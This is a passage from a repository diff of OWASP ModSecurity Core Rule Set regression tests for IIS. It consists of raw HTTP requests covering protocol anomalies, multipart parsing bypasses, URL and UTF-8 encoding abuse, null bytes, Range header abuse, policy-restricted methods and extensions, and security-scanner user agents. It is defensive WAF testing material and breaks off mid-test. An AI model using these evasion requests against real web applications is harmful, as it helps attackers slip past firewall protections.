User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Invalid HTTP Request Line (960911) - Test 3
#####################################################
%remark
This test has a pipe character before the request method.
%endremark
%status 400|403|501
%output 960911
%request
|GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Attempted multipart/form-data bypass (960000)
#####################################################
%remark
This test attempts form name parsing evasion using '.
%endremark
%output 960000
%request
POST /cgi-bin/fup.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/upload.html
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590
Content-Length: $CONTENT_LENGTH
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name=x';filename="';name=contact.txt;"
Content-Type: text/plain
email: security@modsecurity.org
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name="note"
Contact info.
-----------------------------627652292512397580456702590--
%test Failed to parse request body (960912)
#####################################################
%remark
Part missing Content-Disposition header
%endremark
%output 960912
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: $CONTENT_LENGTH
-----------------------------265001916915724
Contt-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
%test Multipart request body failed strict validation (960914)
#####################################################
%output 960914
%remark
Invalid Quoting
%endremark
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: $CONTENT_LENGTH
-----------------------------265001916915724
Content-Disposition: form-data; name='name; filename="'; name=payload;"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
%test Multipart parser detected a possible unmatched boundary (960915)
#####################################################
%remark
Unmatched final boundary
%endremark
%output 960915
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: $CONTENT_LENGTH
-----------------------------265001916915724
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915725--
%test Invalid Request Body (960000)
#####################################################
%remark
Invalid Quoting
%endremark
%output 960000
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: $CONTENT_LENGTH
-----------------------------265001916915724
Content-Disposition: form-data; name="fi;le"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
%test Invalid Request Body/XML (960912)
#####################################################
%remark
Incorrect ending error tag </err>
%endremark
%output 960912
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: text/xml
Content-Length: $CONTENT_LENGTH
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<SOAP-ENV:Body>
<xkms:StatusRequest xmlns:xkms="http://www.w3.org/2002/03/xkms#" Id="_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659" ResponseId="_c1c36b3f-f962-4aea-bfbd-07ed58468c9b" Service="http://www.soapclient.com/xml/xkms2">
<xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>
<xkms:RespondWith>http://www.w3.org/2002/03/xkms#X509Cert</xkms:RespondWith>
</xkms:StatusRequest>
</SOAP-ENV:Body><error></err>
</SOAP-ENV:Envelope>
%test Content-Length HTTP header is not numeric (960016)
#####################################################
%remark
When Apache received multiple headers with the same name, it will contat them into one header with commas separating the individual payloads.
%endremark
%status 413|400
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Content-Length: 3
abc
%test Content-Length HTTP header is not numeric (960016)
#####################################################
%remark
Content-Length should only contain digits. This has a semi-colon.
%endremark
%status 413|400
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3;
abc
%test GET or HEAD Request with Body Content (960011)
#####################################################
%remark
This request sends a request body while using a GET request.
%endremark
#%status 400
%output 960011
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: $CONTENT_LENGTH
abc
%test POST request missing Content-Length Header (960012)
#####################################################
%output 960012
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
%test Invalid Use of Identity Encoding (960902)
#####################################################
%output 960902
%event 960902
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Encoding: Identity
%test Expect Header Not Allowed for HTTP 1.0 (960022)
#####################################################
%output 960022
%event 960022
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Expect: 100-continue
%test Pragma Header requires Cache-Control Header for HTTP/1.1 requests (960020)
#####################################################
%output 960020
%event 960020
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Pragma: no-cache
%test Range: field exists and begins with 0 (958291)
#####################################################
%output 958291
%event 958291
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Range: bytes=0-
%test Range: Invalid Last Byte Value (958230)
#####################################################
%output 958230
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
Keep-Alive: 300
Proxy-Connection: keep-alive
Connection: close
%test Range: Too many fields (958231)
#####################################################
%output 958231
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
Keep-Alive: 300
Proxy-Connection: keep-alive
Connection: close
%test Multiple/Conflicting Connection Header Data Found (958295)
#####################################################
%output 958295
%event 958295
%var connection=keep-alive
%var connection=close
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Connection: $connection, $connection
%test URL Encoding Abuse Attack Attempt (950107)
#####################################################
%output 950107
%event 950107
%var encoded_arg=%1G
%var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33%
%request
GET /?parm=$encoded_arg HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Multiple URL Encoding Detected (950109)
#####################################################
%output 950109
%event 950109
%var encoded_arg=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34
#%var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33%
%request
GET /?parm=$encoded_arg HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test URL Encoding Abuse Attack Attempt (950108)
#####################################################
%output 950108
%event 950108
%var encoded_arg=%1G
%var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33%
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: $CONTENT_LENGTH
param=$encoded_arg
%test URL Encoding Abuse Attack Attempt/XML (950108)
#####################################################
%output 950108
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: text/xml
Content-Length: $CONTENT_LENGTH
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<SOAP-ENV:Body>
<xkms:StatusRequest xmlns:xkms="http://www.w3.org/2002/03/xkms#" Id="_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659" ResponseId="_c1c36b3f-f962-4aea-bfbd-07ed58468c9b" Service="http://www.soapclient.com/xml/xkms2">
<xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>
<xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith>
</xkms:StatusRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
%test UTF8 Encoding Abuse Attack Attempt (950801)
#####################################################
%output 950801
%var arg=%c0%af
%var arg=%c0
%var arg=%F5%80%BF%BF
%request
GET /?param=$arg HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Unicode Full/Half Width Abuse Attack Attempt (950116)
#####################################################
%output 950116
%request
GET /?param=foo%uFF01 HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Proxy access attempt (960014)
#####################################################
%output 960014
%request
GET http://www.some_remote_site.com/ HTTP/1.0
Host: www.some_remote_site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Invalid character in request (960901)
#####################################################
%output 960901
%event 960901
%request
GET /?param=foo%00 HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%endtest

126
iis/ModSecurityIIS/owasp_crs/util/regression_tests/tests/modsecurity_crs_21_protocol_anomalies.tests Normal file
View File

@@ -0,0 +1,126 @@
%timeout 10
# FILE 21 - protocol anomalies
%test Request Missing a Host Header (960008)
#####################################################
%output 960008
%request
GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Empty Host Header (960007)
#####################################################
%output 960007
%request
GET / HTTP/1.0
Host:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Missing an Accept Header (960015)
#####################################################
%output 960015
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Has an Empty Accept Header (960021)
#####################################################
%output 960021
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept:
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Missing a User Agent Header (960009)
#####################################################
%output 960009
%request
GET / HTTP/1.0
Host: $hostname
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Has an Empty User Agent Header (960006)
#####################################################
%output 960006
%request
GET / HTTP/1.0
Host: $hostname
User-Agent:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Containing Content, but Missing Content-Type header (960904)
#####################################################
%output 960904
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Length: 5
foo=1
%test Host header is a numeric IP address (960017)
#####################################################
%output 960017
%request
GET / HTTP/1.0
Host: 192.168.1.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%endtest

113
iis/ModSecurityIIS/owasp_crs/util/regression_tests/tests/modsecurity_crs_23_request_limits.tests Normal file
View File

File diff suppressed because one or more lines are too long

119
iis/ModSecurityIIS/owasp_crs/util/regression_tests/tests/modsecurity_crs_30_http_policy.tests Normal file
View File

@@ -0,0 +1,119 @@
%timeout 10
# FILE 30 - HTTP Policy
%test Method is not allowed by policy (960032)
#####################################################
%output 960032
%var request_method=DELETE
%var request_method=FOO
%var request_method=SUBSCRIBE
%request
$request_method / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request content type is not allowed by policy (960010)
#####################################################
%output 960010
%var type=multipart/;
%var type=multipart/foo;
%var type=application/foo;
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: $type boundary=0000
Content-Length: $CONTENT_LENGTH
--0000
Content-Disposition: form-data; name="name"
John Smith
--0000
Content-Disposition: form-data; name="email"
john.smith@example.com
--0000
Content-Disposition: form-data; name="image"; filename="image.jpg"
Content-Type: image/jpeg
BINARYDATA
--0000--
%test HTTP protocol version is not allowed by policy (960034)
#####################################################
%output 960034
%var http=HTTP/3.0
%var http=HTTP/0.8
%var http=JUNK/1.0
%request
GET / $http
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test URL file extension is restricted by policy (960035)
#####################################################
%output 960035
%var ext=.bak
%var ext=.db
%var ext=.old
%request
GET /foo$ext HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test HTTP header is restricted by policy (960038)
#####################################################
%output 960038
%var restricted_header=Proxy-Connection: keep-alive
%var restricted_header=Translate: f
%var restricted_header=Lock-Token: <opaquelocktoken:a515cfa4-5da4-22e1-f5bf-00a0451e6bf7>
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
$restricted_header
Keep-Alive: 300
Proxy-Connection: keep-alive
%endtest

82
iis/ModSecurityIIS/owasp_crs/util/regression_tests/tests/modsecurity_crs_35_bad_robots.tests Normal file
View File

@@ -0,0 +1,82 @@
%timeout 10
# FILE 35 - HTTP Bad Robots
%test Request Indicates a Security Scanner Scanned the Site (990002)
#####################################################
%output 990002
%var ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij
%var ua=Arachni/0.2.1
%var ua=w3af.sourceforge.net
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: $ua
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Indicates a Security Scanner Scanned the Site (990901)
#####################################################
%output 990901
%var header=Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
$header
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Indicates a Security Scanner Scanned the Site (990902)
#####################################################
%output 990902
%var file=/nessustest
%request
GET $file HTTP/1.0
Host: $hostname
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
$header
